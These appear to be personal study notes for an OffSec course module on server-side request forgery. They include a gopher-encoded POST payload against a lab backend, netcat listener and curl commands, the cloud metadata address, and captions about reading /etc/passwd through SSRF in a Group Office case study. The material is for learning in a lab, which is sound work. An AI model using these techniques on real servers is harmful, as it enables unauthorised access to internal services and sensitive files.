Tree's Notes
  • Overview
  • Tools & Cheatsheets
  • Hacking Methodology
  • Hands-on Practice
  • Linux
    • Linux Basics
  • Windows
    • Windows Basics
  • MacOS
    • MacOS Basics
  • Web
    • Web Basics
  • Mobile
    • iOS
    • Android
  • OS Agnostic
    • Template
  • Courses
    • Hack The Box
      • Bug Bounty Hunter
        • Module 1: Web Requests
        • Module 2: Introduction to Web Applications
        • Module 3: Using Web Proxies
        • Module 4: Information Gathering - Web Edition
        • Module 5: Attacking Web Applications with Ffuf
        • Module 6: JavaScript Deobfuscation
        • Module 7: Cross-Site Scripting (XSS)
        • Module 8: SQL Injection Fundamentals
        • Module 9: SQLMap Essentials
        • Module 10: Command Injections
        • Module 11: File Upload Attacks
        • Module 12: Server-Side Attacks
        • Module 13: Login Brute Forcing
        • Module 14: Broken Authentication
        • Module 15: Web Attacks
        • Module 16: File Inclusion
        • Module 17: Session Security
        • Module 18: Web Service & API Attacks
        • Module 19: Hacking Wordpress
        • Module 20: Bug Bounty Hunting Process
    • OffSec
      • 🦊EXP-301
        • Module 1: Windows User Mode Exploit Development: General Course Information
        • Module 2: WinDbg and x86 Architecture
        • Module 3: Exploiting Stack Overflows
        • Module 4: Exploiting SEH Overflows
        • Module 5: Introduction to IDA Pro
        • Module 6: Overcoming Space Restrictions: Egghunters
        • Module 7: Creating Custom Shellcode
        • Module 8: Reverse Engineering for Bugs
        • Module 9: Stack Overflows and DEP Bypass
        • Module 10: Stack Overflows and ASLR Bypass
        • Module 11: Format String Specifier Attack Part I
        • Module 12: Format String Specifier Attack Part II
        • Module 13: Trying Harder: The Labs
      • 🐙EXP-312
        • Module 1: macOS Control Bypasses: General Course Information
        • Module 2: Virtual Machine Setup Guide
        • Module 3: Introduction to macOS
        • Module 4: macOS Binary Analysis Tools
        • Module 5: The Art of Crafting Shellcodes
        • Module 6: The Art of Crafting Shellcodes (Apple Silicon Edition)
        • Module 7: Dylib Injection
        • Module 8: The Mach Microkernel
        • Module 9: XPC Attacks
        • Module 10: Function Hooking on macOS
        • Module 11: The macOS Sandbox
        • Module 12: Bypassing Transparency, Consent, and Control (Privacy)
        • Module 13: GateKeeper Internals
        • Module 14: Bypassing GateKeeper
        • Module 15: Symlink and Hardlink Attacks
        • Module 16: Injecting Code into Electron Applications
        • Module 17: Getting Kernel Code Execution
        • Module 18: Mach IPC Exploitation
        • Module 19: macOS Penetration Testing
        • Module 20: Chaining Exploits on macOS Ventura
        • Module 21: Mount(ain) of Bugs (archived)
      • ⚓IR-200
        • Module 1: Incident Response Overview
        • Module 2: Fundamentals of Incident Response
        • Module 3: Phases of Incident Response
        • Module 4: Incident Response Communication Plans
        • Module 5: Common Attack Techniques
        • Module 6: Incident Detection and Identification
        • Module 7: Initial Impact Assessment
        • Module 8: Digital Forensics for Incident Responders
        • Module 9: Incident Response Case Management
        • Module 10: Active Incident Containment
        • Module 11: Incident Eradication and Recovery
        • Module 12: Post-Mortem Reporting
        • Module 13: Incident Response Challenge Labs
      • 🐉PEN-103
      • 🐲PEN-200
        • Module 1: Copyright
        • Module 2: Penetration Testing with Kali Linux: General Course Information
        • Module 3: Introduction to Cybersecurity
        • Module 4: Effective Learning Strategies
        • Module 5: Report Writing for Penetration Testers
        • Module 6: Information Gathering
        • Module 7: Vulnerability Scanning
        • Module 8: Introduction to Web Application Attacks
        • Module 9: Common Web Application Attacks
        • Module 10: SQL Injection Attacks
        • Module 11: Client-side Attacks
        • Module 12: Locating Public Exploits
        • Module 13: Fixing Exploits
        • Module 14: Antivirus Evasion
        • Module 15: Password Attacks
        • Module 16: Windows Privilege Escalation
        • Module 17: Linux Privilege Escalation
        • Module 18: Port Redirection and SSH Tunneling
        • Module 19: Tunneling Through Deep Packet Inspection
        • Module 20: The Metasploit Framework
        • Module 21: Active Directory Introduction and Enumeration
        • Module 22: Attacking Active Directory Authentication
        • Module 23: Lateral Movement in Active Directory
        • Module 24: Enumerating AWS Cloud Infrastructure
        • Module 25: Attacking AWS Cloud Infrastructure
        • Module 26: Assembling the Pieces
        • Module 27: Trying Harder: The Challenge Labs
      • 🛜PEN-210
        • Module 1: IEEE 802.11
        • Module 2: Wireless Networks
        • Module 3: Wi-Fi Encryption
        • Module 4: Linux Wireless Tools, Drivers, and Stacks
        • Module 5: Wireshark Essentials
        • Module 6: Frames and Network Interaction
        • Module 7: Aircrack-ng Essentials
        • Module 8: Cracking Authentication Hashes
        • Module 9: Attacking WPS Networks
        • Module 10: Rogue Access Points
        • Module 11: Attacking Captive Portals
        • Module 12: Attacking WPA Enterprise
        • Module 13: bettercap Essentials
        • Module 14: Determining Chipsets and Drivers
        • Module 15: Kismet Essentials
        • Module 16: Manual Network Connections
      • 🔗PEN-300
        • Module 1: Evasion Techniques and Breaching Defenses: General Course Information
        • Module 2: Operating System and Programming Theory
        • Module 3: Client Side Code Execution With Office
        • Module 4: Phishing with Microsoft Office
        • Module 5: Client Side Code Execution With Windows Script Host
        • Module 6: Reflective PowerShell
        • Module 7: Process Injection and Migration
        • Module 8: Introduction to Antivirus Evasion
        • Module 9: Advanced Antivirus Evasion
        • Module 10: Application Whitelisting
        • Module 11: Bypassing Network Filters
        • Module 12: Linux Post-Exploitation
        • Module 13: Kiosk Breakouts
        • Module 14: Windows Credentials
        • Module 15: Windows Lateral Movement
        • Module 16: Linux Lateral Movement
        • Module 17: Microsoft SQL Attacks
        • Module 18: Active Directory Exploitation
        • Module 19: Attacking Active Directory
        • Module 20: Combining the Pieces
        • Module 21: Trying Harder: The Labs
      • ⚛️SEC-100
      • 🛡️SOC-200
        • Module 1: Introduction to SOC-200
        • Module 2: Attacker Methodology Introduction
        • Module 3: Windows Endpoint Introduction
        • Module 4: Windows Server Side Attacks
        • Module 5: Windows Client-Side Attacks
        • Module 6: Windows Privilege Escalation
        • Module 7: Windows Persistence
        • Module 8: Linux Endpoint Introduction
        • Module 9: Linux Server Side Attacks
        • Module 10: Linux Privilege Escalation
        • Module 11: Network Detections
        • Module 12: Antivirus Alerts and Evasion
        • Module 13: Active Directory Enumeration
        • Module 14: Network Evasion and Tunneling
        • Module 15: Windows Lateral Movement
        • Module 16: Active Directory Persistence
        • Module 17: SIEM Part One: Intro to ELK
        • Module 18: SIEM Part Two: Combining the Logs
        • Module 19: Trying Harder: The Labs
      • TH-200
        • Module 1: Threat Hunting Concepts and Practices
        • Module 2: Threat Actor Landscape Overview
        • Module 3: Communication and Reporting for Threat Hunters
        • Module 4: Hunting With Network Data
        • Module 5: Hunting on Endpoints
        • Module 6: Theat Hunting Without IoCs
        • Module 7: Threat Hunting Challenge Labs
      • 🦉WEB-200
        • Module 1: Introduction to WEB-200
        • Module 2: Tools (archived)
        • Module 3: Web Application Enumeration Methodology
        • Module 4: Introduction to Burp Suite
        • Module 5: Cross-Site Scripting Introduction and Discovery
        • Module 6: Cross-Site Scripting Exploitation and Case Study
        • Module 7: Cross-Origin Attacks
        • Module 8: Introduction to SQL
        • Module 9: SQL Injection
        • Module 10: Directory Traversal Attacks
        • Module 11: XML External Entities
        • Module 12: Server-side Template Injection - Discovery and Exploitation
        • Module 13: Command Injection
        • Module 14: Server-side Request Forgery
        • Module 15: Insecure Direct Object Referencing
        • Module 16: Assembling the Pieces: Web Application Assessment Breakdown
      • 🕷️WEB-300
        • Module 1: Introduction
        • Module 2: Tools & Methodologies
        • Module 3: ManageEngine Applications Manager AMUserResourcesSyncServlet SSQL Injection RCE
        • Module 4: DotNetNuke Cookie Deserialization RCE
        • Module 5: ERPNext Authentication Bypass and Remote Code Execution
        • Module 6: openCRX Authentication Bypass and Remote Code Execution
        • Module 7: openITCOCKPIT XSS and OS Command Injection - Blackbox
        • Module 8: Concord Authentication Bypass to RCE
        • Module 9: Server-Side Request Forgery
        • Module 10: Guacamole Lite Prototype Pollution
        • Module 11: Dolibarr Eval Filter Bypass RCE
        • Module 12: RudderStack SQLi and Coraza WAF Bypass
        • Module 13: Conclusion
        • Module 14: ATutor Authentication Bypass and RCE (archived)
        • Module 15: ATutor LMS Type Juggling Vulnerability (archived)
        • Module 16: Atmail Mail Server Appliance: from XSS to RCE (archived)
        • Module 17: Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability (archived)
    • SANS
      • FOR572
Powered by GitBook
On this page
  • Introduction to SSRF
  • Interacting with the Vulnerable Server
  • Interacting with Back-end Systems and Private IP Ranges
  • Testing for SSRF
  • Accessing the SSRF Sandbox Application
  • Discovering SSRF Vulnerabilities
  • Calling Home to Kali
  • Exploiting SSRF
  • Retrieving Data
  • Instance Metadate in Cloud
  • Bypassing Authentication in Microservices
  • Alternative URL Schemes
  • Extra Mile
  • Case Study: Group Office
  • Accessing Group Office
  • Discovering the SSRF Vulnerabilities
  • Exploiting the SSRF Vulnerabilities
Edit on GitHub
  1. Courses
  2. OffSec
  3. WEB-200

Module 14: Server-side Request Forgery

Introduction to SSRF

Interacting with the Vulnerable Server

Example: Using a SSRF we could interact with the loopback interface of a vulnerable server which would ordinarily not be accessible otherwise.

Interacting with Back-end Systems and Private IP Ranges

Private IP Addresses

IP address range

Number of addresses

10.0.0.0/8

16,777,216

172.16.0.0/12

1,048,576

192.168.0.0/16

65,536

Using a SSRF we could also potentially interact with other systems on the internal network.

Testing for SSRF

Accessing the SSRF Sandbox Application

Start the VPN, VM, and add the IPs and hostnames to your hosts file.

Discovering SSRF Vulnerabilities

If we discover upload functionality via URL, URI, or link, we should test for SSRF.

Note that requests to other domains will most likely fail since the VMs in the lab environment do not have full access to the Internet.

Calling Home to Kali

Restarting the Apache HTTP Server

kali@kali:~$ sudo systemctl restart apache2

When we are performing this kind of testing in the real world, we should include a unique identifier in the URL. This would help us locate the attack in our log file.

Verifying the application requested a page from our Kali VM

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.101 - - [15/Oct/2021:16:49:40 -0400] "GET /hello_ssrf_world HTTP/1.1" 404 491 "-" "python-requests/2.26.0"

Exploiting SSRF

Retrieving Data

Instance Metadate in Cloud

Some cloud hosting providers, such as AWS, use the link-local address 169.254.169.254 for their metadata services. Others provide access through DNS, such as Google Cloud, which uses metadata.google.internal. These may include sensitive/private information.

Bypassing Authentication in Microservices

Any security controls enforced by an API gateway on traffic entering the internal network would not apply to the traffic between two microservices since the traffic originates within the internal network

Alternative URL Schemes

Checking the contents of the kali default homepage

kali@kali:~$ head /usr/share/kali-defaults/web/homepage.html        
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Kali Linux</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="Kali Linux is an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments." />
    <meta name="author" content="Kali Linux" />
    <!-- based on template from http://bootstraptaste.com -->
    <!-- css -->

Starting a netcat listener on port 9000

kali@kali:~$ nc -nvlp 9000
listening on [any] 9000 ...

Using curl to send a request with the Gopher protocol

kali@kali:~$ curl gopher://127.0.0.1:9000/hello_gopher

Netcat listener handling the Gopher request

...
listening on [any] 9000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56264
ello_gopher

Example HTTP GET request

GET /hello_gopher HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: curl/7.74.0
Accept: */*

Sending a mock HTTP request over the Gopher protocol

kali@kali:~$ curl gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1

Netcast listener handlin gour mock HTTP request

...
listening on [any] 9000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56274
GET /hello_gopher HTTP/1.1

Extra Mile

Use the Gopher protocol to send a POST request with the username "white.rabbit" and password "dontbelate" to the login endpoint to obtain a flag.
gopher://backend:80/_POST%20/login%20HTTP/1.1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2041%0d%0a%0d%0ausername%3dwhite.rabbit&password%3ddontbelate

Case Study: Group Office

Accessing Group Office

Start the VPN, the VM, and add the IP and hostname to your hosts file.

Discovering the SSRF Vulnerabilities

Restarting apache2

kali@kali:~$ sudo systemctl restart apache2

Checking our access.log file with tail

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.105 - - [17/Nov/2021:10:34:02 -0500] "GET / HTTP/1.1" 200 10956 "-" "Group-Office HttpClient 6.5.77 (curl)"

Access log contents include a request to /repeater

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.105 - - [17/Nov/2021:10:34:02 -0500] "GET / HTTP/1.1" 200 10956 "-" "Group-Office HttpClient 6.5.77 (curl)"
192.168.50.105 - - [17/Nov/2021:10:55:39 -0500] "GET /repeater HTTP/1.1" 404 437 "-" "Group-Office HttpClient 6.5.77 (curl)"

Access log contents include a request to /fromurl

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.50.105 - - [17/Nov/2021:11:25:45 -0500] "GET /fromurl HTTP/1.1" 404 437 "-" "Group-Office HttpClient 6.5.77 (curl)"<c/r>

Creating itworked.html and moving it to our webroot

kali@kali:~$ echo "it worked" > itworked.html
                      
kali@kali:~$ sudo mv itworked.html /var/www/html/itworked.html

Exploiting the SSRF Vulnerabilities

PreviousModule 13: Command InjectionNextModule 15: Insecure Direct Object Referencing

Last updated 5 months ago

🦉
SSRF Sandbox
SSRF Sandbox previewing http://www.megacorpone.com
SSRF Sandbox - Verify Link
Verifying http://www.megacorpone.com
Attempting to access the Status page
Using the SSRF vulnerability to access the Status page
An example file URI in Firefox
An exception occurred
Accessing the contents of /etc/passwd using curl
Accessing /status using the gopher protocol
Sending a POST request with gopher to /status
Double URL-encoding in HTTP Request body
Group Office login page
Group Office Start Page
The list of portlets we can add to the Start Page
The updated Start page including the News portlet
Group Office RSS Feeds window
Adding our IP address as an RSS feed
HTTP history for addin RSS feeds
Proxy request in Burp Suite Repeater
The response content is a 404 page including our IP address
My Account link
Updating a user's profile picture
Insert from URL dialog window
Submitting our IP address in the URL field
Burp Suite HTTP history with request to /api/upload.php
The bloblId is used in following request
Updating the URL parameter
The server responds with an error
The server returned an empty response to our attack
Group Office Address book page
Downloading a blob
Retrieving our HTML page
Sending the SSRF attack to access /etc/passwd
Retrieving the contents of /etc/passwd